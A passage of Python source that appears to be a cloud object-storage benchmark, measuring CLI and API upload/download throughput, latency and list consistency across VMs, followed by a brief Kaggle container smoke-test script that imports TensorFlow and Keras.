sum([np.sum(size) for size in sizes]) /
(last_stop_time - first_start_time) * 8,
'bit / second', metadata=distribution_metadata))
# QPS metrics
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (any stream active)',
num_records / (last_stop_time - first_start_time), 'operation / second',
metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (all streams active)',
len(all_active_latencies) / (first_stop_time - last_start_time),
'operation / second', metadata=distribution_metadata))
# Statistics about benchmarking overhead
gap_time = sum((active_duration - active_time
for active_duration, active_time
in zip(active_durations, total_active_times)))
results.append(sample.Sample(
'Multi-stream ' + operation + ' total gap time',
gap_time, 'second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' gap time proportion',
gap_time / (first_stop_time - last_start_time) * 100.0,
'percent', metadata=distribution_metadata))
def _DistributionToBackendFormat(dist):
"""Convert an object size distribution to the format needed by the backend.
Args:
dist: a distribution, given as a dictionary mapping size to
frequency. Size will be a string with a quantity and a
unit. Frequency will be a percentage, including a '%'
character. dist may also be a string, in which case it represents
a single object size which applies to 100% of objects.
Returns:
A dictionary giving an object size distribution. Sizes will be
integers representing bytes. Frequencies will be floating-point
numbers in [0,100], representing percentages.
Raises:
ValueError if dist is not a valid distribution.
"""
if isinstance(dist, dict):
val = {flag_util.StringToBytes(size):
flag_util.StringToRawPercent(frequency)
for size, frequency in six.iteritems(dist)}
else:
# We allow compact notation for point distributions. For instance,
# '1KB' is an abbreviation for '{1KB: 100%}'.
val = {flag_util.StringToBytes(dist): 100.0}
# I'm requiring exact addition to 100, which can always be satisfied
# with integer percentages. If we want to allow general decimal
# percentages, all we have to do is replace this equality check with
# approximate equality.
if sum(six.itervalues(val)) != 100.0:
raise ValueError("Frequencies in %s don't add to 100%%!" % dist)
return val
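# Example (sketch): '1KB' becomes {1000: 100.0}, and {'1KB': '50%', '10KB': '50%'} becomes
# {1000: 50.0, 10000: 50.0}, assuming flag_util.StringToBytes('1KB') == 1000.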
class APIScriptCommandBuilder(object):
"""Builds command lines for the API test script.
Attributes:
test_script_path: the path to the API test script on the remote machine.
storage: the storage provider to use, in the format expected by
the test script.
service: the ObjectStorageService object corresponding to the
storage provider.
"""
def __init__(self, test_script_path, storage, service):
self.test_script_path = test_script_path
self.storage = storage
self.service = service
def BuildCommand(self, args):
"""Build a command string for the API test script.
Args:
args: a list of strings. These will become space-separated
arguments to the test script.
Returns:
A string that can be passed to vm.RemoteCommand.
"""
cmd_parts = [
self.test_script_path,
'--storage_provider=%s' % self.storage
] + args + self.service.APIScriptArgs()
if FLAGS.object_storage_storage_class is not None:
cmd_parts += ['--object_storage_class',
FLAGS.object_storage_storage_class]
return ' '.join(cmd_parts)
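# Example (sketch): for GCS with bucket 'mybucket',
#   BuildCommand(['--bucket=mybucket', '--scenario=OneByteRW'])
# yields something like
#   '<test_script_path> --storage_provider=GCS --bucket=mybucket --scenario=OneByteRW <service args>'
# where the trailing arguments come from service.APIScriptArgs().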
class UnsupportedProviderCommandBuilder(APIScriptCommandBuilder):
"""A dummy command builder for unsupported providers.
When a provider isn't supported by the API test script yet, we
create this command builder for them. It will let us run the CLI
benchmark on that provider, but if the user tries to run an API
benchmark, it will throw an error.
Attributes:
provider: the name of the unsupported provider.
"""
def __init__(self, provider):
self.provider = provider
def BuildCommand(self, args):
raise NotImplementedError('API tests are not supported on provider %s.' %
self.provider)
def OneByteRWBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for small object latency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
one_byte_rw_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=OneByteRW'])
_, raw_result = vm.RemoteCommand(one_byte_rw_cmd)
logging.info('OneByteRW raw result is %s', raw_result)
for up_and_down in ['upload', 'download']:
search_string = 'One byte %s - (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = ONE_BYTE_LATENCY % up_and_down
if len(result_string) > 0:
_JsonStringToPercentileResults(results,
result_string[0],
sample_name,
LATENCY_UNIT,
metadata)
else:
raise ValueError('Unexpected test outcome from OneByteRW api test: '
'%s.' % raw_result)
def SingleStreamThroughputBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for large object throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
single_stream_throughput_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=SingleStreamThroughput'])
_, raw_result = vm.RemoteCommand(single_stream_throughput_cmd)
logging.info('SingleStreamThroughput raw result is %s', raw_result)
for up_and_down in ['upload', 'download']:
search_string = 'Single stream %s throughput in Bps: (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = SINGLE_STREAM_THROUGHPUT % up_and_down
if not result_string:
raise ValueError('Unexpected test outcome from '
'SingleStreamThroughput api test: %s.' % raw_result)
# Convert Bytes per second to Mega bits per second
# We use MB (10^6) to be consistent with network
# bandwidth convention.
result = json.loads(result_string[0])
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (sample_name, percentile),
8 * float(result[percentile]) / 1000 / 1000,
THROUGHPUT_UNIT,
metadata))
def ListConsistencyBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for bucket list consistency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
list_consistency_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--iterations=%d' % FLAGS.object_storage_list_consistency_iterations,
'--scenario=ListConsistency'])
_, raw_result = vm.RemoteCommand(list_consistency_cmd)
logging.info('ListConsistency raw result is %s', raw_result)
for scenario in LIST_CONSISTENCY_SCENARIOS:
metric_name = '%s %s' % (scenario, LIST_CONSISTENCY_PERCENTAGE)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
if not result_string:
raise ValueError(
'Cannot get percentage from ListConsistency test.')
results.append(sample.Sample(
metric_name,
(float)(result_string[0]),
NA_UNIT,
metadata))
# Parse the list inconsistency window if there is any.
metric_name = '%s %s' % (scenario, LIST_INCONSISTENCY_WINDOW)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
# Also report the list latency. These latencies are from the lists
# that were consistent.
metric_name = '%s %s' % (scenario, LIST_LATENCY)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
def LoadWorkerOutput(output):
"""Load output from worker processes to our internal format.
Args:
output: list of strings. The stdouts of all worker processes.
Returns:
A tuple of start_time, latency, size. Each of these is a list of
numpy arrays, one array per worker process. start_time[i],
latency[i], and size[i] together form a table giving the start
time, latency, and size (bytes transmitted or received) of all
send/receive operations for worker i.
start_time holds POSIX timestamps, stored as np.float64. latency
holds times in seconds, stored as np.float64. size holds sizes in
bytes, stored as np.int64.
Example:
start_time[i] latency[i] size[i]
------------- ---------- -------
0.0 0.5 100
1.0 0.7 200
2.3 0.3 100
Raises:
AssertionError, if an individual worker's input includes
overlapping operations, or operations that don't move forward in
time, or if the input list isn't in stream number order.
"""
start_times = []
latencies = []
sizes = []
for worker_out in output:
json_out = json.loads(worker_out)
for stream in json_out:
assert len(stream['start_times']) == len(stream['latencies'])
assert len(stream['latencies']) == len(stream['sizes'])
start_times.append(np.asarray(stream['start_times'], dtype=np.float64))
latencies.append(np.asarray(stream['latencies'], dtype=np.float64))
sizes.append(np.asarray(stream['sizes'], dtype=np.int64))
return start_times, latencies, sizes
def _RunMultiStreamProcesses(vms, command_builder, cmd_args, streams_per_vm):
"""Runs all of the multistream read or write processes and doesn't return
until they complete.
Args:
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
cmd_args: arguments for the command_builder.
    streams_per_vm: number of threads per vm.
  Returns:
    A list of stdout strings from the worker processes, one per VM.
  """
output = [None] * len(vms)
def RunOneProcess(vm_idx):
logging.info('Running on VM %s.', vm_idx)
cmd = command_builder.BuildCommand(
cmd_args + ['--stream_num_start=%s' % (vm_idx * streams_per_vm)])
out, _ = vms[vm_idx].RobustRemoteCommand(cmd, should_log=False)
output[vm_idx] = out
# Each vm/process has a thread managing it.
threads = [
threading.Thread(target=RunOneProcess, args=(vm_idx,))
for vm_idx in range(len(vms))]
for thread in threads:
thread.start()
logging.info('Started %s processes.', len(vms))
# Wait for the threads to finish
for thread in threads:
thread.join()
logging.info('All processes complete.')
return output
def _DatetimeNow():
"""Returns datetime.datetime.now()."""
return datetime.datetime.now()
def _ColdObjectsWrittenFilename():
"""Generates a name for the objects_written_file.
Returns:
The name of the objects_written_file if it should be created, or None.
"""
if FLAGS.object_storage_objects_written_file_prefix:
# Note this format is required by _ColdObjectsWrittenFileAgeHours.
datetime_suffix = _DatetimeNow().strftime('%Y%m%d-%H%M')
return '%s-%s-%s-%s' % (
FLAGS.object_storage_objects_written_file_prefix,
FLAGS.object_storage_region,
uuid.uuid4(), # Add a UUID to support parallel runs that upload data.
datetime_suffix)
return None
def _ColdObjectsWrittenFileAgeHours(filename):
"""Determines the age in hours of an objects_written_file.
Args:
filename: The name of the file.
Returns:
The age of the file in hours (based on the name), or None.
"""
# Parse the year, month, day, hour, and minute from the filename based on the
# way it is written in _ColdObjectsWrittenFilename.
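  # e.g. a filename ending in '...-20200102-0130' parses to datetime(2020, 1, 2, 1, 30).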
match = re.search(r'(\d\d\d\d)(\d\d)(\d\d)-(\d\d)(\d\d)$', filename)
if not match:
return None
year, month, day, hour, minute = (int(item) for item in match.groups())
write_datetime = datetime.datetime(year, month, day, hour, minute)
write_timedelta = _DatetimeNow() - write_datetime
return write_timedelta.total_seconds() / _SECONDS_PER_HOUR
def _MultiStreamOneWay(results, metadata, vms, command_builder,
service, bucket_name, operation):
"""Measures multi-stream latency and throughput in one direction.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
operation: 'upload' or 'download'
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
size_distribution = _DistributionToBackendFormat(
FLAGS.object_storage_object_sizes)
logging.info('Distribution %s, backend format %s.',
FLAGS.object_storage_object_sizes, size_distribution)
streams_per_vm = FLAGS.object_storage_streams_per_vm
start_time = (
time.time() +
MultiThreadStartDelay(FLAGS.num_vms, streams_per_vm).m_as('second'))
logging.info('Start time is %s', start_time)
cmd_args = [
'--bucket=%s' % bucket_name,
'--objects_per_stream=%s' % (
FLAGS.object_storage_multistream_objects_per_stream),
'--num_streams=%s' % streams_per_vm,
'--start_time=%s' % start_time,
'--objects_written_file=%s' % objects_written_file]
if operation == 'upload':
cmd_args += [
'--object_sizes="%s"' % size_distribution,
'--object_naming_scheme=%s' % FLAGS.object_storage_object_naming_scheme,
'--scenario=MultiStreamWrite']
elif operation == 'download':
cmd_args += ['--scenario=MultiStreamRead']
else:
    raise Exception('Value of operation must be \'upload\' or \'download\'. '
                    'Value is: \'' + operation + '\'')
output = _RunMultiStreamProcesses(vms, command_builder, cmd_args,
streams_per_vm)
start_times, latencies, sizes = LoadWorkerOutput(output)
if FLAGS.object_storage_worker_output:
with open(FLAGS.object_storage_worker_output, 'w') as out_file:
out_file.write(json.dumps(output))
_ProcessMultiStreamResults(start_times, latencies, sizes, operation,
list(six.iterkeys(size_distribution)), results,
metadata=metadata)
# Write the objects written file if the flag is set and this is an upload
objects_written_path_local = _ColdObjectsWrittenFilename()
if operation == 'upload' and objects_written_path_local is not None:
# Get the objects written from all the VMs
# Note these are JSON lists with the following format:
# [[object1_name, object1_size],[object2_name, object2_size],...]
outs = vm_util.RunThreaded(
lambda vm: vm.RemoteCommand('cat ' + objects_written_file), vms)
maybe_storage_account = ''
maybe_resource_group = ''
if FLAGS.storage == 'Azure':
maybe_storage_account = '"azure_storage_account": "%s", ' % \
service.storage_account.name
maybe_resource_group = '"azure_resource_group": "%s", ' % \
service.resource_group.name
# Merge the objects written from all the VMs into a single string
objects_written_json = \
'{%s%s"bucket_name": "%s", "objects_written": %s}' % \
(maybe_storage_account, maybe_resource_group, bucket_name,
'[' + ','.join([out for out, _ in outs]) + ']')
# Write the file
with open(objects_written_path_local, 'w') as objects_written_file_local:
objects_written_file_local.write(objects_written_json)
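# Illustrative shape of the merged objects-written file (hypothetical names and
# sizes; the Azure fields only appear when FLAGS.storage == 'Azure'):
#   {"bucket_name": "pkb12345",
#    "objects_written": [[["vm0_obj_0", 1024], ["vm0_obj_1", 2048]],
#                        [["vm1_obj_0", 1024]]]}
# i.e. one inner list per VM, each holding [object_name, object_size] pairs.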
def MultiStreamRWBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream read/write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'upload')
logging.info('Finished multi-stream write test. Starting '
'multi-stream read test.')
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'download')
logging.info('Finished multi-stream read test.')
def MultiStreamWriteBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'upload')
logging.info('Finished multi-stream write test.')
def MultiStreamReadBenchmark(results, metadata, vms, command_builder,
service, bucket_name, read_objects):
"""A benchmark for multi-stream read latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
read_objects: List of lists of [object_name, object_size]. In the outermost
list, each element corresponds to a VM's worker process.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream read test on %s VMs.', len(vms))
assert read_objects is not None, (
'api_multistream_reads scenario requires the '
'object_storage_read_objects_prefix flag to be set.')
# Send over the objects written file
try:
# Write the per-VM objects-written-files
assert len(read_objects) == len(vms), (
'object_storage_read_objects_prefix file specified requires exactly '
'%d VMs, but %d were provisioned.' % (len(read_objects), len(vms)))
for vm, vm_objects_written in zip(vms, read_objects):
# Note that each file is written with a unique name so that parallel runs
# don't overwrite the same local file. They are pushed to the VM to a file
# named OBJECTS_WRITTEN_FILE.
tmp_objects_written_path = os.path.join(vm_util.GetTempDir(),
'%s-%s' % (OBJECTS_WRITTEN_FILE,
vm.name))
with open(tmp_objects_written_path, 'w') as objects_written_file:
objects_written_file.write(json.dumps(vm_objects_written))
vm.PushFile(tmp_objects_written_path,
posixpath.join(vm_util.VM_TMP_DIR, OBJECTS_WRITTEN_FILE))
except Exception as e:
raise Exception('Failed to upload the objects written files to the VMs: '
'%s' % e)
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'download')
logging.info('Finished multi-stream read test.')
def CheckPrerequisites(benchmark_config):
"""Verifies that the required resources are present.
Args:
benchmark_config: Benchmark config to verify.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
perfkitbenchmarker.errors.Setup.InvalidFlagConfigurationError: On invalid
flags.
"""
del benchmark_config
data.ResourcePath(DATA_FILE)
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
if not FLAGS.object_storage_region:
raise errors.Setup.InvalidFlagConfigurationError(
'Please specify --object_storage_region if using '
'--object_storage_apply_region_suffix_to_bucket_name.')
def _AppendPercentilesToResults(output_results, input_results, metric_name,
metric_unit, metadata):
# PercentileCalculator will (correctly) raise an exception on empty
# input, but an empty input list makes semantic sense here.
if len(input_results) == 0:
return
percentiles = PercentileCalculator(input_results)
for percentile in PERCENTILES_LIST:
output_results.append(sample.Sample(('%s %s') % (metric_name, percentile),
percentiles[percentile],
metric_unit,
metadata))
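# Sketch of the resulting samples (assuming PERCENTILES_LIST contains names such
# as 'p50' and 'p99'): for metric_name 'upload latency' this appends samples
# named 'upload latency p50', 'upload latency p99', etc., each carrying the
# corresponding value from PercentileCalculator plus the shared metadata.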
def CLIThroughputBenchmark(output_results, metadata, vm, command_builder,
service, bucket):
"""A benchmark for CLI tool throughput.
  We upload a set of files from a local directory to the bucket via CLI tools
  and then download them back, measuring the throughput of each direction.
Args:
    output_results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
    bucket: the primary bucket to benchmark.
Raises:
NotEnoughResultsError: if we failed too many times to upload or download.
"""
data_directory = '/tmp/run/data'
# The real solution to the iteration count issue is dynamically
# choosing the number of iterations based on how long they
# take. This will work for now, though.
if FLAGS.storage == providers.AZURE:
iteration_count = CLI_TEST_ITERATION_COUNT_AZURE
elif FLAGS.cli_test_size == 'normal':
iteration_count = CLI_TEST_ITERATION_COUNT
else:
iteration_count = LARGE_CLI_TEST_ITERATION_COUNT
# The CLI-based tests require some provisioning on the VM first.
vm.RemoteCommand(
'cd /tmp/run/; bash cloud-storage-workload.sh %s' % FLAGS.cli_test_size)
# CLI tool based tests.
cli_upload_results = []
cli_download_results = []
if FLAGS.cli_test_size == 'normal':
data_size_in_mbits = DATA_SIZE_IN_MBITS
file_names = ['file-%s.dat' % i for i in range(100)]
else:
data_size_in_mbits = LARGE_DATA_SIZE_IN_MBITS
file_names = ['file_large_3gib.dat']
for _ in range(iteration_count):
try:
service.EmptyBucket(bucket)
except Exception:
pass
try:
_, res = service.CLIUploadDirectory(vm, data_directory,
file_names, bucket)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to upload, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli upload throughput %f', throughput)
cli_upload_results.append(throughput)
try:
vm.RemoveFile(posixpath.join(DOWNLOAD_DIRECTORY, '*'))
except Exception:
pass
try:
_, res = service.CLIDownloadBucket(vm, bucket,
file_names, DOWNLOAD_DIRECTORY)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to download, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli download throughput %f', throughput)
cli_download_results.append(throughput)
expected_successes = iteration_count * (1 - CLI_TEST_FAILURE_TOLERANCE)
if (len(cli_download_results) < expected_successes or
len(cli_upload_results) < expected_successes):
raise NotEnoughResultsError('Failed to complete the required number of '
'iterations.')
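  # For instance, if iteration_count were 100 and CLI_TEST_FAILURE_TOLERANCE
  # were 0.05, at least 95 successful uploads and 95 successful downloads would
  # be required to proceed.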
# Report various percentiles.
metrics_prefix = ''
if FLAGS.cli_test_size != 'normal':
metrics_prefix = '%s ' % FLAGS.cli_test_size
_AppendPercentilesToResults(output_results,
cli_upload_results,
'%s%s' % (metrics_prefix,
UPLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
_AppendPercentilesToResults(output_results,
cli_download_results,
'%s%s' % (metrics_prefix,
DOWNLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
def PrepareVM(vm, service):
vm.Install('pip')
vm.RemoteCommand('sudo pip install absl-py')
vm.RemoteCommand('sudo pip install pyyaml')
vm.Install('openssl')
  # Prepare data on the VM: create a run directory under the temporary
  # directory and open up its permissions.
vm.RemoteCommand('sudo mkdir -p ' + SCRIPT_DIR)
vm.RemoteCommand('sudo chmod 777 ' + SCRIPT_DIR)
vm.RemoteCommand('sudo mkdir -p ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo chmod 777 ' + DOWNLOAD_DIRECTORY)
remote_package_dir = posixpath.join(SCRIPT_DIR, 'providers')
vm.RemoteCommand('sudo mkdir -p ' + remote_package_dir)
vm.RemoteCommand('sudo chmod 777 ' + remote_package_dir)
file_path = data.ResourcePath(DATA_FILE)
vm.PushFile(file_path, SCRIPT_DIR)
# push the test script
script_path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, API_TEST_SCRIPT))
vm.PushFile(script_path, '/tmp/run/')
# push the package dependencies of the test script
for file_name in API_TEST_SCRIPT_PACKAGE_FILES + service.APIScriptFiles():
path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, file_name))
logging.info('Uploading %s to %s', path, vm)
vm.PushFile(path, remote_package_dir)
service.PrepareVM(vm)
def CleanupVM(vm, service):
service.CleanupVM(vm)
vm.RemoteCommand('/usr/bin/yes | sudo pip uninstall absl-py')
vm.RemoteCommand('sudo rm -rf /tmp/run/')
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
vm.RemoteCommand('rm -f %s' % objects_written_file)
def Prepare(benchmark_spec):
"""Prepare vm with cloud provider tool and prepare vm with data file.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Raises:
ColdDataError: If this benchmark is reading cold data, but the data isn't
cold enough (as configured by object_storage_read_objects_min_hours).
"""
# We would like to always cleanup server side states when exception happens.
benchmark_spec.always_call_cleanup = True
# Load the objects to read file if specified
benchmark_spec.read_objects = None
if FLAGS.object_storage_read_objects_prefix is not None:
    # Glob for matching files and pick an arbitrary one that is old enough,
    # in case more than one exists.
search_prefix = '%s-%s*' % (
FLAGS.object_storage_read_objects_prefix,
FLAGS.object_storage_region)
read_objects_filenames = glob.glob(search_prefix)
logging.info('Considering object files %s*: %s', search_prefix,
read_objects_filenames)
for filename in read_objects_filenames:
age_hours = _ColdObjectsWrittenFileAgeHours(filename)
if age_hours and age_hours > FLAGS.object_storage_read_objects_min_hours:
read_objects_filename = filename
break
else:
raise ColdDataError(
'Object data older than %d hours does not exist. Current cold data '
'files include the following: %s' % (
FLAGS.object_storage_read_objects_min_hours,
read_objects_filenames))
with open(read_objects_filename) as read_objects_file:
# Format of json structure is:
# {"bucket_name": <bucket_name>,
# ... any other provider-specific context needed
# "objects_written": <objects_written_array>}
benchmark_spec.read_objects = json.loads(read_objects_file.read())
benchmark_spec.read_objects_filename = read_objects_filename
benchmark_spec.read_objects_age_hours = age_hours
    # Reading these objects consumes them (the bucket is emptied afterwards),
    # so delete the local file that lists them as well.
if not FLAGS.object_storage_dont_delete_bucket:
os.remove(read_objects_filename)
assert benchmark_spec.read_objects is not None, (
'Failed to read the file specified by '
'--object_storage_read_objects_prefix')
# Load the provider and its object storage service
providers.LoadProvider(FLAGS.storage)
# Determine the bucket name.
if benchmark_spec.read_objects is not None:
# Using an existing bucket
bucket_name = benchmark_spec.read_objects['bucket_name']
if FLAGS.object_storage_bucket_name is not None:
logging.warning('--object_storage_bucket_name ignored because '
'--object_storage_read_objects was specified')
else:
# Use a new bucket (or the name of a specified bucket).
bucket_name = FLAGS.object_storage_bucket_name or 'pkb%s' % FLAGS.run_uri
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
# Avoid non-alphanumeric characters in the region as bucket names on some
# clouds cannot contain non-alphanumeric characters.
bucket_name = '%s%s' % (bucket_name,
re.sub(r'[\W_]', '', FLAGS.object_storage_region))
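      # For example (hypothetical names), a base bucket name of 'pkb12345' with
      # --object_storage_region=us-central1 becomes 'pkb12345uscentral1'.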
service = object_storage_service.GetObjectStorageClass(FLAGS.storage)()
if (FLAGS.storage == 'Azure' and
FLAGS.object_storage_read_objects_prefix is not None):
# Storage provider is azure and we are reading existing objects.
# Need to prepare the ObjectStorageService with the existing storage
# account and resource group associated with the bucket containing our
# objects
service.PrepareService(
FLAGS.object_storage_region,
# On Azure, use an existing storage account if we
# are reading existing objects
(benchmark_spec.read_objects['azure_storage_account'],
benchmark_spec.read_objects['azure_resource_group']))
elif FLAGS.storage == 'Azure' and FLAGS.object_storage_bucket_name:
# We are using a bucket that may exist from a previous run. We should use
# a storage account and resource group for this bucket based on the same
# name (for consistency).
service.PrepareService(
FLAGS.object_storage_region,
# The storage account must not exceed 24 characters.
(bucket_name[:24], bucket_name + '-resource-group'),
try_to_create_storage_account_and_resource_group=True)
else:
service.PrepareService(FLAGS.object_storage_region)
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: PrepareVM(vm, service), vms)
# Make the bucket.
if benchmark_spec.read_objects is None:
# Fail if we cannot create the bucket as long as the bucket name was not
# set via a flag. If it was set by a flag, then we will still try to create
# the bucket, but won't fail if it was created. This supports running the
# benchmark on the same bucket multiple times.
raise_on_bucket_creation_failure = not FLAGS.object_storage_bucket_name
if FLAGS.storage == 'GCP' and FLAGS.object_storage_gcs_multiregion:
# Use a GCS multiregional bucket
multiregional_service = gcs.GoogleCloudStorageService()
multiregional_service.PrepareService(FLAGS.object_storage_gcs_multiregion
or DEFAULT_GCS_MULTIREGION)
multiregional_service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
else:
# Use a regular bucket
service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
# Save the service and the bucket name for later
benchmark_spec.service = service
benchmark_spec.bucket_name = bucket_name
def Run(benchmark_spec):
"""Run storage benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Total throughput in the form of tuple. The tuple contains
the sample metric (string), value (float), unit (string).
"""
logging.info('Start benchmarking object storage service, '
'scenario is %s, storage provider is %s.',
FLAGS.object_storage_scenario, FLAGS.storage)
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
metadata = {'storage_provider': FLAGS.storage}
vms = benchmark_spec.vms
if FLAGS[OBJECT_STORAGE_REGION].present:
metadata[REGIONAL_BUCKET_LOCATION] = FLAGS.object_storage_region
else:
metadata[REGIONAL_BUCKET_LOCATION] = DEFAULT
if FLAGS[OBJECT_STORAGE_GCS_MULTIREGION].present:
metadata[GCS_MULTIREGION_LOCATION] = FLAGS.object_storage_gcs_multiregion
else:
metadata[GCS_MULTIREGION_LOCATION] = DEFAULT
metadata.update(service.Metadata(vms[0]))
results = []
test_script_path = '/tmp/run/%s' % API_TEST_SCRIPT
try:
command_builder = APIScriptCommandBuilder(
test_script_path, STORAGE_TO_API_SCRIPT_DICT[FLAGS.storage], service)
except KeyError:
command_builder = UnsupportedProviderCommandBuilder(FLAGS.storage)
for name, benchmark in [('cli', CLIThroughputBenchmark),
('api_data', OneByteRWBenchmark),
('api_data', SingleStreamThroughputBenchmark),
('api_namespace', ListConsistencyBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms[0], command_builder,
service, bucket_name)
# MultiStreamRW and MultiStreamWrite support multiple VMs, so they have a
# slightly different calling convention than the others.
for name, benchmark in [('api_multistream', MultiStreamRWBenchmark),
('api_multistream_writes',
MultiStreamWriteBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms, command_builder, service, bucket_name)
# MultiStreamRead has the additional 'read_objects' parameter
if FLAGS.object_storage_scenario in {'api_multistream_reads', 'all'}:
metadata['cold_objects_filename'] = benchmark_spec.read_objects_filename
metadata['cold_objects_age_hours'] = benchmark_spec.read_objects_age_hours
MultiStreamReadBenchmark(results, metadata, vms, command_builder, service,
bucket_name,
benchmark_spec.read_objects['objects_written'])
# Clear the bucket if we're not saving the objects for later
# This is needed for long running tests, or else the objects would just pile
# up after each run.
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.EmptyBucket(bucket_name)
return results
def Cleanup(benchmark_spec):
"""Clean up storage bucket/container and clean up vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: CleanupVM(vm, service), vms)
# Only clean up bucket if we're not saving the objects for a later run
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.DeleteBucket(bucket_name)
service.CleanupService()
|
test_build.py
|
# This script should run without errors whenever we update the
# kaggle/python container. It checks that all our most popular packages can
# be loaded and used without errors.
import tensorflow as tf
print(tf.__version__)
hello = tf.constant('TensorFlow ok')
sess = tf.Session()
print(sess.run(hello))
print("Tensorflow ok")
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
print("Keras ok")
# Test Kaggle learntools
